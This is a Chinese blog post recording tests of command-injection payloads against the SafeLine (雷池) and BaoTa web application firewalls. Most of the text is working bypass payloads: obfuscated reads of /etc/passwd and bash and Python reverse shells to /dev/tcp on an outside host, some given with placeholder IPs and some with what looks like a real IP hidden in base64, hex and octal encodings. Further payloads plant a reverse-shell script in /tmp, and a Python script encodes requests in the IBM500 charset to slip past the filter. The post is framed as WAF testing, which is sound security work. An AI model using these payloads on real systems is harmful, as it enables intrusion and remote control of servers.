像诗里纷飞的美丽章节.|

园龄:粉丝:关注:

bypass waf测试_rce

前言

以下验证绕过效果都使用开源雷池waf

知己知彼百战百胜,想bypass waf还是得先了解waf

waf是什么

WAF(WebApplicationFirewall,WEB应用防火墙)会过滤和监测 Web 应用程序与互联网之间的 HTTP/HTTPS 流量,以此来保护 Web 应用程序安全。它通常会保护 Web 应用程序免受各种形式的攻击,例如跨站点脚本 (XSS)、文件包含以及 SQL 注入等。

waf的分类:

硬WAF、云WAF、软WAF、代码层WAF

waf的工作原理:

用户对网站服务器发出请求后,雷池waf先于服务器接收流量,过滤后的流量再转发给服务器。

引用雷池waf手册的一张图

本文使用雷池waf进行实验,链接:https://waf-ce.chaitin.cn/docs/

官方提供语义分析技术解析以及绕过思路:

https://stack.chaitin.com/techblog/detail/80

二、rce绕过尝试

先尝试绕过rce,rce应该好绕一点,特别是linux命令特性比较多

尝试cat /etc/passwd发现拦截

使用未初始化的变量绕过

在Linux中,可以利用Bash的未初始化变量来逃避Waf的检测。未初始化的变量会被视为一个空字符串。如果你尝试引用一个未初始化的变量 $u,它不会报错,而是会返回一个空值。

cat /etc/passwd

在平衡防护时可以绕过,高强度防护时被拦截

cat /etc$u/passwd$u

wget

wget命令在平衡防护和高强度防护都可以绕过

bash反弹shell

被拦截:127.0.0.1 | /bin/bash -i >& /dev/tcp/0.0.0.0/5003 0>&1

高强度防护放行127.0.0.1 | /bin$u/bash$u -i$u >&$u /dev$u/tcp$u/xx.xx.xx.xx$u/5003$u 0>&1$u

但是bash命令反弹shell无反应,考虑可能权限不够,/tmp下有可写可执行权限,写个反弹脚本在tmp

先探测是否存在tmp命令

127.0.0.1 | (cd /tmp && ls)

把反弹命令写入写入tmp目录

127.0.0.1 | echo$u "/bin$u/bash$u -i$u >&$u /dev$u/tcp$u/0.0.0.0$u/5003$u 0>&1$u" > /tmp/2.sh

本地测试加$u的命令写入文件可以执行

被拦截:127.0.0.1 | (cd /tmp && ls -al)

高强度防护绕过127.0.0.1 | (cd /tmp && ls$u -al)

可以看到文件权限添加成功

被拦截:127.0.0.1 | bash$u /tmp$u/2.sh$u

高强度防护绕过127.0.0.1 | /bin$u/bash$u /tmp/2.sh

上线成功

使用$u注意:

发现写入的ip是残缺的,发现我写入的语句是

127.0.0.1 | echo$u "/bin$u/bash$u -i$u >&$u /dev$u/tcp$U/$u121.0.0.0/5003$u 0>&1$u" > /tmp/2.sh

$u在数字或者字符串前面,后面的数字和字符串就会被忽略,其他地方同理,所以$u需要加载一个完整命令的最后

在符号前面加$u,符号是不会被省略的

python反弹shell

暂时没绕过去,看看后面结合其他方法能不能绕过

python$u -c$u 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xx.xx.xx.xx",5003));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

符号绕过

1.通配符

cat

*   代表『 0 个到无穷多个』任意字符
?   代表『一定有一个』任意字符
[ ] 同样代表『一定有一个在括号内』的字符(非任意字符)。例如 [abcd] 代表『一定有一个字符, 可能是 a, b, c, d 这四个任何一个』
[ - ]   若有减号在中括号内时,代表『在编码顺序内的所有字符』。例如 [0-9] 代表 09 之间的所有数字,因为数字的语系编码是连续的!
[^ ]    若中括号内的第一个字符为指数符号 (^) ,那表示『反向选择』,例如 [^abc] 代表 一定有一个字符,只要是非 a, b, c 的其他字符就接受的意思。

高强度防护绕过:127.0.0.1 | /b?n/c?t /???/pass*

有个小坑:c?t或者?at是没办法执行的,因为c?t有好几个命令适用,系统不清楚你想使用哪个,所以需要加上命令的绝对路径/b?n/c?t

反弹shell

高强度防护绕过(宝塔也可以):127.0.0.1 |/b?n/b*h -i >& /dev/tcp/xx.xx.xx.xx/5003 0>&1

2.'连接符

在bash的操作环境中还有一个非常有用的功能,那就是连接符

'c'a't' /'e't'c'/'p'a's's'w'd 每个单引号括起来的字符会被逐一拼接起来

这样看比较直观,命令注意闭合

高强度防护可绕过:127.0.0.1 | 'c'a't' /'e't'c'/'p'a's's'w'd

反弹shell

无法绕过:<font style="color:rgb(18, 18, 18);">/'b'i'n'/b'a's'h' -i >& /d'e'v/t'c'p/162.251.94.247/50000 0>&1</font>

3."连接符

和'连接符同理

高强度防护绕过:127.0.0.1 | "c"a"t" /"e"t"c"/"p"a"s"s"w"d

反弹shell

无法绕过:/"b"i"n"/b"a"s"h" -i >& /d"e"v/t"c"p/xx.xx.xx.xx/5003 0>&1

4.\转义符

反斜杠(\)在Shell中是转义字符,用来忽略后面字符的特殊含义。然而,当反斜杠出现在普通字母前时(如i、n等),这些字母本身并没有特殊含义,所以反斜杠没有实际作用。每个转义后的字母依然是原来的字母。

绕过失败:127.0.0.1 | c\a\t /\e\t\c/p\a\s\s\w\d

5.$*绕过

c$*at%20/et$*c/p$*as$*s$*wd

字符集编码绕过

修改请求header中的Content-Type去使用不同得字符集编码,例如charset=ibm500,未配置为检测不同编码的恶意负载的 WAF 可能无法将请求识别为恶意请求。

可以使用python进行字符集编码。

import urllib.parse

#s = '127.0.0.1 | python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xx.xx.xx.xx",5003));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);\''
# First, encode the string using the appropriate encoding
s = '127.0.0.1 | ls'
try:
    encoded_bytes = s.encode('IBM500')
    # Then, URL encode the resulting bytes
    url_encoded_string = urllib.parse.quote_plus(encoded_bytes)
    print(url_encoded_string)
except Exception as e:
    print(f"An error occurred: {e}")

在发包时payload替换成编码后的payload,且修改content-type,

Content-Type: application/x-www-form-urlencoded; charset=cp875

但是只有部分情况可用

缓冲区溢出绕过

还是被拦截

编码绕过

雷池的编码效果不太行,对宝塔的效果还不错

base64

平衡防护绕过127.0.0.1 | echo 'Y2F0IC9ldGMvcGE=' | b"a"s"e"6"4" -dsswd

反弹shell

平衡防护绕过(宝塔):127.0.0.1 | echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE2Mi4yNTEuOTQuMjQ3LzUwMDAwIDA+JjE=' | b"a"s"e"6"4" -d | sh

绕过宝塔:127.0.0.1 | echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE2Mi4yNTEuOTQuMjQ3LzUwMDAwIDA+JjE=' | b"a"s"e"6"4" -d |$u bash

十六进制

无法绕过:echo "2f62696e2f62617368202d69203e26202f6465762f7463702f3136322e3235312e3934372f3530303020303e262031" | xxd -r -p | bash

反弹shell

无法绕过(宝塔可以):127.0.0.1 | echo "2f62696e2f62617368202d69203e26202f6465762f7463702f3136322e3235312e39342e3234372f353030303020303e2631"| xxd -r -p | sh

绕过宝塔:127.0.0.1 | echo "2f62696e2f62617368202d69203e26202f6465762f7463702f3136322e3235312e39342e3234372f353030303020303e2631"| xxd -r -p |$u bash

八进制

无法绕过:127.0.0.1 | **$(**printf "\143\141\164\040\057\145\164\143\057\160\141\163\163\167\144\012")

反弹shell:

127.0.0.1 | $(printf "\057\142\151\156\057\142\141\163\150\040\055\151\040\076\046\040\057\144\145\166\057\164\143\160\057\061\066\062\056\062\065\061\056\071\064\056\062\064\067\057\065\060\060\060\060\040\060\076\046\061")

绕过宝塔:127.0.0.1 | printf "\057\142\151\156\057\142\141\163\150\040\055\151\040\076\046\040\057\144\145\166\057\164\143\160\057\061\066\062\056\062\065\061\056\071\064\056\062\064\067\057\065\060\060\060\060\040\060\076\046\061"|$u bash

空格绕过

在bash下可以用$IFS、${IFS}、$IFS$9、<、>、<>、%09(在URL上使用较多)、%20(space)

雷池没拦截空格,只能本地测试了

本文作者:xiaoxin07

本文链接:https://www.cnblogs.com/xiaoxin07/p/18502670

版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。

posted @   小新07  阅读(197)  评论(0编辑  收藏  举报
点击右上角即可分享
微信分享提示
评论
收藏
关注
推荐
深色
回顶
收起